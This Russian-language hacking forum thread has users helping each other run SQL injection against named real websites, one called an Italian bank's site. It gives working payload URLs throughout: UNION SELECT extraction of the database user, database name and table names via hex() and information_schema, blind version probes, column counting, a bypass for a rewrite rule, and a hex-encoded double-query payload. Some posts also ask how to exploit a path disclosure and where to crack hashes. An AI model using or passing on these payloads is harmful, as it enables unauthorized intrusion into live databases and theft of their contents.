Не могу подобрать НИ количество столбцов и полей, как только я не крутил....не понимаю в чем проблема.... вот ссыль: http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318 (MYSQL Injection) При любом раскладе пишет: The used SELECT statements have a different number of columns если кто нить подберет,расскажите пожалуйста. П.С. Сайт итальянского банка.
jecka3000 скорее всего это слепая скуля... http://www.windpress.it/aziende.php?ricerca=A_SCH&id=1318+AND+SUBSTRING((version()),1,1)=4 Version: 4.1.16-standard Database:CRM User:windpress@media
Как обойти? Вывод норм, как только тейбл нейм так и все Всего: 64 Тож самое только когда вводишь юзера 5.0.67-log u7749_2
используй hex(): http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,hex(user()),database(),0x0b)+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0 http://design.websys.ru/?do=list&sex=1+UNION+SELECT+concat_ws(0x0b,0x0b,hex(TABLE_NAME),0x0b)+FROM+information_schema.TABLES+LIMIT+1,1+--+&goal%5B0%5D%3D&goal%5B1%5D%3D&goal%5B2%5D%3D&goal%5B3%5D%3D&goal%5B4%5D%3D&page=0
Заметил в хостинге такие ошибки а когда начал лить двиг то вылезло вот такое /home/freehost/www/freehostusers/) in /mnt/d2/freehostusers/flairh6/my/index.php flairh6/my- это мое, а остально ето хостинга непобоюсь минуса в профиле, но все таки спрошу, как это можно использовать?
В скрипте есть такой участок кода: $nomer = $_GET['nomer']; $art = mysql_query("SELECT article FROM chat_articles WHERE nomer=$nomer"); $article = mysql_result($art,0); Понятно что здест скуля, только проблема в том как её заюзать из-за реврайта? Вот правило для модреврайт: RewriteRule ^art/([a-z0-9]*)/([a-z0-9]*)/?$ art.php?ver=$1&nomer=$2 [L,QSA] Возможно ли в этом случае произвести иньекцию и если да то каким образом?
Попробуй обратиться к скрипту на прямую art.php?ver=1&nomer=-1[SQL] хотя скорее всего тебя пошлют с NOT FOUND или реврайт на индекс, а так единственая проблемма это пробелы потому как судя по SQL запросу коментить ничего не надо(хотя я больше чем уверен что пременная используеться где то еще в SQL запросе).
есть sql-inj http://www.yetinepal.com/modules/school/school.php?id=2+order+by+1 количество столбцов - 1 пробую union select http://www.yetinepal.com/modules/school/school.php?id=2+uNion+sElecT+1 получаем 1222 - The used SELECT statements have a different number of columns как такие ситуации можно обойти? P.s. мускул пятый http://www.yetinepal.com/modules/school/school.php?id=2+and+substring(version(),1,1)=5
Всем привет внимание вопрос: попался сайт со скулей, но запрос вида ?id=1+union+select+1,2,3,4/* выдаёт, - "Ошибка - две страницы с одним идентификатором" что за хрень? впервые такое вижу( Если неправильное число полей, то The used SELECT statements have a different number of columns т.е. тут ок. Что с этим можно сделать?
Поле 2 и 3 отвечают за путь до изображения вверху страницы,в поле 3 проходят тока цифры и по всей видимости там либо JOIN либо сабселект или еще одна гверя так как патч до этого изображения по всей видимости береться из бд(потому как если указать от балды значения то путь до изображения идет пустой), а во втором поле идет какой то фильтр на выводимые данные потому как ничего кроме 0x2f(/) и 0x2e(.) в нем не проходят(возможно file_exists() и etc), вывод в 1-ом и 4-ом поле на страницу я не увидел, только блайнд по всей видимости, версия 5 http://www.niat.ru/design/page_rus.php?id=8+and+substring(version(),1,1)=5
PaCo куда торопишься? http://www.niat.ru/design/page_rus.php?id=11111+union+select+1,2,concat(0x3a3a3a3a,Version()),4/* Grey: Джок, тебе повезло, что тут вывод в сообщение об ошибке, но там двойной запрос и в идеале нужно так юзать: Code: http://www.niat.ru/design/page_rus.php?id=1+and+1=2+union+select+1,2,0x3120616e6420313d3220756e696f6e2073656c65637420636f6e63617428273e272c76657273696f6e2829292f2a,4/* Позвольте, что значит повезло? Я увидел там вывод, хотя искал двойной запрос. Есть вывод-нет заморочек Grey: так не честно А вообще ты так можешь паренька сильно загрузить и он может не понять, как так получилось с инъекцией, а это повлечет новые вопросы...
привет всем, я понимаю что на мой вопрос полюбому есть ответ в этой теме, но что бы не листать 757 страниц задам его ещё раз. Как перевести таблицу в кеш? Раньше пользовался http://nahta4ok.far.ru/tools.php , но вчера он закрыл свой сайт. Может есть праги?